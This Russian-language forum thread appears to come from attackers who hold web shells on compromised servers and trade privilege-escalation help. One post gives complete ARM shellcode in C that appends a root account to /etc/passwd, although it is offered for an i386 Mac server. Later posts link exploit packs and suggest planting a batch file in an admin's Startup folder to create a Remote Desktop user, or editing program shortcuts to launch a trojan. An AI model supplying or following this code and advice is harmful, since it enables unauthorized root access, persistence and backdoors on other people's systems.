Есть шелл,нужен сплоит (первый раз встречаю Macintosh HD) Server.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386
Не могу нормально скомпилить. Даже на своей машине. Code: #include <stdio.h> char SC[] = /* Thumb mode */ "\x05\x50\x45\xe0" /* sub r5, r5, r5 */ "\x01\x50\x8f\xe2" /* add r5, pc, #1 */ "\x15\xff\x2f\xe1" /* bx r5 */ /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */ "\x78\x46" /* mov r0, pc */ "\x7C\x30" /* adds r0, #124 */ "\xff\x21" /* movs r1, #255 */ "\xff\x31" /* adds r1, #255 */ "\xff\x31" /* adds r1, #255 */ "\xff\x31" /* adds r1, #255 */ "\x45\x31" /* adds r1, #69 */ "\xdc\x22" /* movs r2, #220 */ "\xc8\x32" /* adds r2, #200 */ "\x05\x27" /* movs r7, #5 */ "\x01\xdf" /* svc 1 */ /* r8 = fd */ "\x80\x46" /* mov r8, r0 */ /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */ "\x41\x46" /* mov r1, r8 */ "\x08\x1c" /* adds r0, r1, #0 */ "\x79\x46" /* mov r1, pc */ "\x18\x31" /* adds r1, #24 */ "\xc0\x46" /* nop (mov r8, r8) */ "\x48\x22" /* movs r2, #72 */ "\x04\x27" /* movs r7, #4 */ "\x01\xdf" /* svc 1 */ /* close(fd) */ "\x41\x46" /* mov r1, r8 */ "\x08\x1c" /* adds r0, r1, #0 */ "\x06\x27" /* movs r7, #6 */ "\x01\xdf" /* svc 1 */ /* exit(0) */ "\x1a\x49" /* subs r1, r1, r1 */ "\x08\x1c" /* adds r0, r1, #0 */ "\x01\x27" /* movs r7, #1 */ "\x01\xdf" /* svc 1 */ /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */ "\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72" "\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f" "\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a" "\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55" "\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30" "\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f" "\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73" "\x68\x0a" /* /etc/passwd */ "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; }
У меня без проблем (2.6.17-gentoo-r8) попробуй так: gcc -o file file.c -lpthread скомпилил http://depositfiles.com/files/2sebpiiyg
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его Что есть из пабликового?
Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка) батник с созданием пользователя удаленного стола, то так и делай Так же можешь подредактировать ярлыки программ (вставив запуск своего файла) если нет, то хоть версию iis скажи...
Не плохая идея кстати, только не в C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка, а в C:\Documents and Settings\Admin\Главное меню\Программы\Автозагрузка, ну или какой там юзер с админ правами, так папка и будет называться (посмотри командой net user). Ну это подойдет только если сервак ребутают вообще.
Попробуй слоитпак enlightenment там под эту ветку кажись было... http://grsecurity.net/~spender/enlightenment.tgz
При комплиировании: Code: sh-3.2$ gcc -o file 1.c In file included from 1.c:20: /usr/include/linux/atm.h:210: error: expected specifier qualifier-list before 'uint32_t' Uname a : Code: Linux 2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686 athlon i386 GNU/Linux Эксплоит : http://www.exploit-db.com/exploits/10613/ подскажите в чем проблема.
Code: $ uname -a Linux ***.com 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 i686 i686 i386 GNU/Linux есть что?
Linux server01 2.6.25.9 #1 Thu Jun 26 18:54:56 CEST 2008 i686 Не подскажите сплоит?-) P.S. из enlightenment не подошли...
